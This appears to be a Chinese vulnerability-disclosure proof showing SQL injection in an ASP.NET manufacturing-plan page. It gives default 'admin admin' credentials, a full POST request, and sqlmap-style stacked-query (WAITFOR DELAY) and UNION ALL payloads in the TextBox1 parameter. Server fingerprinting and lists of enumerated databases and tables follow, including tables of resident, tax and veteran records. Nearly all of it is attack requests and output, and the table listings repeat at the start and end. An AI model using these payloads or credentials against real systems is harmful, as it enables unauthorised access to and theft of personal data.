| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| logmarkhistory |
| restorefile |
| restorefilegroup |
| restorehistory |
| suspect_pages |
+-------------------------------------+
Database: hexieshequ
[15 tables]
+-------------------------------------+
| T_Rental_record |
| aaa |
| staff |
| system_log |
| t_Union_members |
| t_duty |
| t_jiu_renkou_ddj |
| t_jiu_renkou_xinxi_bak2 |
| t_jiu_renkou_xinxi_xilou |
| t_local_tax_record_import |
| t_old_soldier |
| t_tax_info_dtl |
| v_company_tax_rank |
| v_monthly_company_tax_dtl_bak |
| v_no_reg_company |
+-------------------------------------+
漏洞证明:
**.**.**.**/
admin admin
POST /ScManufact/ScPlan.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: **.**.**.**/ScManufact/ScPlan.aspx
Cookie: ASP.NET_SessionId=ctvqjf5hwbhubi3btg0m2t34; mytable_notify_2=170513f4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4609
__VIEWSTATE=%2FwEPDwUKLTU5MzY4NDIzNg9kFgJmD2QWBgIGDzwrABECAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudAIHZAEQFgAWABYAFgJmD2QWEAIBDw9kFgQeC29ubW91c2VvdmVyBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx4Kb25tb3VzZW91dAUddGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9YzsWDmYPZBYCZg8VAhFTY1ZpZXcuYXNweD9JRD0yMxjmtYvor5Xml6XmnJ%2FpgInmi6nlmajkuoxkAgEPDxYCHgRUZXh0BQblk4jlk4hkZAICDw8WAh8EBRIyMDEzLTYtMjAgMTM6MjA6MzhkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVRPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTIzIj7ov5vluqbmmI7nu4Y8L2E%2BZGQCBg8PFgIfBAVVPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwteWVsbG93LWJ0biIgaHJlZj0iU2NEZXRhaWwuYXNweD9JRD0yMyI%2B55Sf5Lqn5piO57uG5Y2VPC9hPmRkAgIPD2QWBB8CBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8DBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYOZg9kFgJmDxUCEVNjVmlldy5hc3B4P0lEPTIyDOmHh%2Bi0reiuouWNlWQCAQ8PFgIfBAUDRERTZGQCAg8PFgIfBAUSMjAxMy02LTIwIDEzOjE2OjQxZGQCAw8PFgIfBAUFYWRtaW5kZAIEDw8WAh8EZWRkAgUPDxYCHwQFUTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLWxvbmctYnRuIiBocmVmPSJTY01hbnVQcm8uYXNweD9JRD0yMiI%2B6L%2Bb5bqm5piO57uGPC9hPmRkAgYPDxYCHwQFVTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLXllbGxvdy1idG4iIGhyZWY9IlNjRGV0YWlsLmFzcHg%2FSUQ9MjIiPueUn%2BS6p%2BaYjue7huWNlTwvYT5kZAIDDw9kFgQfAgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRicfAwUddGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9YzsWDmYPZBYCZg8VAhFTY1ZpZXcuYXNweD9JRD0yMQRlZmVmZAIBDw8WAh8EBQZmZWblr7pkZAICDw8WAh8EBRIyMDEzLTYtMjQgMTM6NDk6MzRkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVRPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTIxIj7ov5vluqbmmI7nu4Y8L2E%2BZGQCBg8PFgIfBAVVPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwteWVsbG93LWJ0biIgaHJlZj0iU2NEZXRhaWwuYXNweD9JRD0yMSI%2B55Sf5Lqn5piO57uG5Y2VPC9hPmRkAgQPD2QWBB8CBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8DBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYOZg9kFgJmDxUCEVNjVmlldy5hc3B4P0lEPTIwBGVlZWVkAgEPDxYCHwQFBGV3d3dkZAICDw8WAh8EBRIyMDEzLTYtMTYgMTY6Mzc6MTlkZAIDDw8WAh8EBQdOb0xvZ2luZGQCBA8PFgIfBGVkZAIFDw8WAh8EBVE8YSBjbGFzcz0iYmJrIGJ1dHRvbiBzbWFsbC1sb25nLWJ0biIgaHJlZj0iU2NNYW51UHJvLmFzcHg%2FSUQ9MjAiPui%2Fm%2BW6puaYjue7hjwvYT5kZAIGDw8WAh8EBVU8YSBjbGFzcz0iYmJrIGJ1dHRvbiBzbWFsbC15ZWxsb3ctYnRuIiBocmVmPSJTY0RldGFpbC5hc3B4P0lEPTIwIj7nlJ%2FkuqfmmI7nu4bljZU8L2E%2BZGQCBQ8PZBYEHwIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHwMFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7Fg5mD2QWAmYPFQIRU2NWaWV3LmFzcHg%2FSUQ9MTYMYmJiYmJiYmJiYmJiZAIBDw8WAh8EBQnnjovlhavom4tkZAICDw8WAh8EBRIyMDEzLTYtMjAgMTQ6MjA6NTlkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVRPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTE2Ij7ov5vluqbmmI7nu4Y8L2E%2BZGQCBg8PFgIfBAVVPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwteWVsbG93LWJ0biIgaHJlZj0iU2NEZXRhaWwuYXNweD9JRD0xNiI%2B55Sf5Lqn5piO57uG5Y2VPC9hPmRkAgYPD2QWBB8CBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8DBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYOZg9kFgJmDxUCEVNjVmlldy5hc3B4P0lEPTEyDWFkYWRkZGRkZGRkZGRkAgEPDxYCHwQFAnNkZGQCAg8PFgIfBAUSMjAxMy02LTE1IDE1OjA1OjI5ZGQCAw8PFgIfBAUFYWRtaW5kZAIEDw8WAh8EBQIzMWRkAgUPDxYCHwQFUTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLWxvbmctYnRuIiBocmVmPSJTY01hbnVQcm8uYXNweD9JRD0xMiI%2B6L%2Bb5bqm5piO57uGPC9hPmRkAgYPDxYCHwQFVTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLXllbGxvdy1idG4iIGhyZWY9IlNjRGV0YWlsLmFzcHg%2FSUQ9MTIiPueUn%2BS6p%2BaYjue7huWNlTwvYT5kZAIHDw9kFgQfAgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRicfAwUddGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9YzsWDmYPZBYCZg8VAhBTY1ZpZXcuYXNweD9JRD0xBkJULTAwMWQCAQ8PFgIfBAUCYnRkZAICDw8WAh8EBRIyMDEzLTYtMTUgMTQ6NDY6MjdkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVQPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTEiPui%2Fm%2BW6puaYjue7hjwvYT5kZAIGDw8WAh8EBVQ8YSBjbGFzcz0iYmJrIGJ1dHRvbiBzbWFsbC15ZWxsb3ctYnRuIiBocmVmPSJTY0RldGFpbC5hc3B4P0lEPTEiPueUn%2BS6p%2BaYjue7huWNlTwvYT5kZAIIDw8WAh4HVmlzaWJsZWhkZAIQDw8WAh8EBQExZGQCEg8PFgIfBAUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYHBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMgUIQnRuRmlyc3QFBkJ0blByZQUHQnRuTmV4dAUHQnRuTGFzdAUIQnV0dG9uR28FBkdWRGF0YQ88KwAMAQgCAWQCPM0Jjspi%2F2%2F%2Bzk1d9dAB5F97u7p3aJWwDAnIyTHV3Q%3D%3D&__EVENTVALIDATION=%2FwEWCwLqtNmfBQLs0bLrBgLSwv2aBALSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CWTR4gesdHVs9NX9UPwV8KiWmxerKKI%2FJ7Q0mwQDqQi7&TextBox1=123*&ImageButton4.x=22&ImageButton4.y=4&TxtPageSize=15&GoPage=1
Parameter: #1* ((custom) POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=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Z3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHwMFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7Fg5mD2QWAmYPFQIRU2NWaWV3LmFzcHg/SUQ9MTYMYmJiYmJiYmJiYmJiZAIBDw8WAh8EBQnnjovlhavom4tkZAICDw8WAh8EBRIyMDEzLTYtMjAgMTQ6MjA6NTlkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVRPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTE2Ij7ov5vluqbmmI7nu4Y8L2E+ZGQCBg8PFgIfBAVVPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwteWVsbG93LWJ0biIgaHJlZj0iU2NEZXRhaWwuYXNweD9JRD0xNiI+55Sf5Lqn5piO57uG5Y2VPC9hPmRkAgYPD2QWBB8CBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8DBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYOZg9kFgJmDxUCEVNjVmlldy5hc3B4P0lEPTEyDWFkYWRkZGRkZGRkZGRkAgEPDxYCHwQFAnNkZGQCAg8PFgIfBAUSMjAxMy02LTE1IDE1OjA1OjI5ZGQCAw8PFgIfBAUFYWRtaW5kZAIEDw8WAh8EBQIzMWRkAgUPDxYCHwQFUTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLWxvbmctYnRuIiBocmVmPSJTY01hbnVQcm8uYXNweD9JRD0xMiI+6L+b5bqm5piO57uGPC9hPmRkAgYPDxYCHwQFVTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLXllbGxvdy1idG4iIGhyZWY9IlNjRGV0YWlsLmFzcHg/SUQ9MTIiPueUn+S6p+aYjue7huWNlTwvYT5kZAIHDw9kFgQfAgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRicfAwUddGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9YzsWDmYPZBYCZg8VAhBTY1ZpZXcuYXNweD9JRD0xBkJULTAwMWQCAQ8PFgIfBAUCYnRkZAICDw8WAh8EBRIyMDEzLTYtMTUgMTQ6NDY6MjdkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVQPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTEiPui/m+W6puaYjue7hjwvYT5kZAIGDw8WAh8EBVQ8YSBjbGFzcz0iYmJrIGJ1dHRvbiBzbWFsbC15ZWxsb3ctYnRuIiBocmVmPSJTY0RldGFpbC5hc3B4P0lEPTEiPueUn+S6p+aYjue7huWNlTwvYT5kZAIIDw8WAh4HVmlzaWJsZWhkZAIQDw8WAh8EBQExZGQCEg8PFgIfBAUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYHBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMgUIQnRuRmlyc3QFBkJ0blByZQUHQnRuTmV4dAUHQnRuTGFzdAUIQnV0dG9uR28FBkdWRGF0YQ88KwAMAQgCAWQCPM0Jjspi/2/+zk1d9dAB5F97u7p3aJWwDAnIyTHV3Q==&__EVENTVALIDATION=/wEWCwLqtNmfBQLs0bLrBgLSwv2aBALSwtXkAgLu/93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CWTR4gesdHVs9NX9UPwV8KiWmxerKKI/J7Q0mwQDqQi7&TextBox1=123';WAITFOR DELAY '0:0:5'--&ImageButton4.x=22&ImageButton4.y=4&TxtPageSize=15&GoPage=1
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: __VIEWSTATE=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Z3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHwMFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7Fg5mD2QWAmYPFQIRU2NWaWV3LmFzcHg/SUQ9MTYMYmJiYmJiYmJiYmJiZAIBDw8WAh8EBQnnjovlhavom4tkZAICDw8WAh8EBRIyMDEzLTYtMjAgMTQ6MjA6NTlkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVRPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTE2Ij7ov5vluqbmmI7nu4Y8L2E+ZGQCBg8PFgIfBAVVPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwteWVsbG93LWJ0biIgaHJlZj0iU2NEZXRhaWwuYXNweD9JRD0xNiI+55Sf5Lqn5piO57uG5Y2VPC9hPmRkAgYPD2QWBB8CBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8DBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYOZg9kFgJmDxUCEVNjVmlldy5hc3B4P0lEPTEyDWFkYWRkZGRkZGRkZGRkAgEPDxYCHwQFAnNkZGQCAg8PFgIfBAUSMjAxMy02LTE1IDE1OjA1OjI5ZGQCAw8PFgIfBAUFYWRtaW5kZAIEDw8WAh8EBQIzMWRkAgUPDxYCHwQFUTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLWxvbmctYnRuIiBocmVmPSJTY01hbnVQcm8uYXNweD9JRD0xMiI+6L+b5bqm5piO57uGPC9hPmRkAgYPDxYCHwQFVTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLXllbGxvdy1idG4iIGhyZWY9IlNjRGV0YWlsLmFzcHg/SUQ9MTIiPueUn+S6p+aYjue7huWNlTwvYT5kZAIHDw9kFgQfAgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRicfAwUddGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9YzsWDmYPZBYCZg8VAhBTY1ZpZXcuYXNweD9JRD0xBkJULTAwMWQCAQ8PFgIfBAUCYnRkZAICDw8WAh8EBRIyMDEzLTYtMTUgMTQ6NDY6MjdkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVQPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTEiPui/m+W6puaYjue7hjwvYT5kZAIGDw8WAh8EBVQ8YSBjbGFzcz0iYmJrIGJ1dHRvbiBzbWFsbC15ZWxsb3ctYnRuIiBocmVmPSJTY0RldGFpbC5hc3B4P0lEPTEiPueUn+S6p+aYjue7huWNlTwvYT5kZAIIDw8WAh4HVmlzaWJsZWhkZAIQDw8WAh8EBQExZGQCEg8PFgIfBAUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYHBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMgUIQnRuRmlyc3QFBkJ0blByZQUHQnRuTmV4dAUHQnRuTGFzdAUIQnV0dG9uR28FBkdWRGF0YQ88KwAMAQgCAWQCPM0Jjspi/2/+zk1d9dAB5F97u7p3aJWwDAnIyTHV3Q==&__EVENTVALIDATION=/wEWCwLqtNmfBQLs0bLrBgLSwv2aBALSwtXkAgLu/93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CWTR4gesdHVs9NX9UPwV8KiWmxerKKI/J7Q0mwQDqQi7&TextBox1=123' UNION ALL SELECT 75,75,75,75,75,75,75,75,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(79)+CHAR(105)+CHAR(75)+CHAR(103)+CHAR(66)+CHAR(73)+CHAR(80)+CHAR(66)+CHAR(110)+CHAR(109)+CHAR(99)+CHAR(69)+CHAR(74)+CHAR(89)+CHAR(81)+CHAR(107)+CHAR(111)+CHAR(97)+CHAR(72)+CHAR(107)+CHAR(87)+CHAR(120)+CHAR(84)+CHAR(115)+CHAR(90)+CHAR(112)+CHAR(99)+CHAR(67)+CHAR(111)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(118)+CHAR(85)+CHAR(87)+CHAR(117)+CHAR(67)+CHAR(113)+CHAR(77)+CHAR(100)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),75,75,75-- -&ImageButton4.x=22&ImageButton4.y=4&TxtPageSize=15&GoPage=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: master
[15 tables]
+-------------------------------------+
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.dm_os_hosts |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.openkeys |
+-------------------------------------+
Database: hexieshequ_develop_old
[15 tables]
+-------------------------------------+
| ERPNForm |
| ERPNFormType |
| ERPNWorkDetails |
| ERPNWorkFlow |
| ERPNWorkFlowNode |
| ERPNWorkFlowWT |
| ERPNWorkToDo |
| staff |
| system_log |
| t_Union_members |
| t_duty |
| t_jiu_renkou_ddj |
| t_jiu_renkou_xinxi_bak2 |
| t_jiu_renkou_xinxi_xilou |
| t_old_soldier |
+-------------------------------------+
Database: msdb
[9 tables]
+-------------------------------------+
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| logmarkhistory |
| restorefile |
| restorefilegroup |
| restorehistory |
| suspect_pages |
+-------------------------------------+
Database: hexieshequ
[15 tables]
+-------------------------------------+
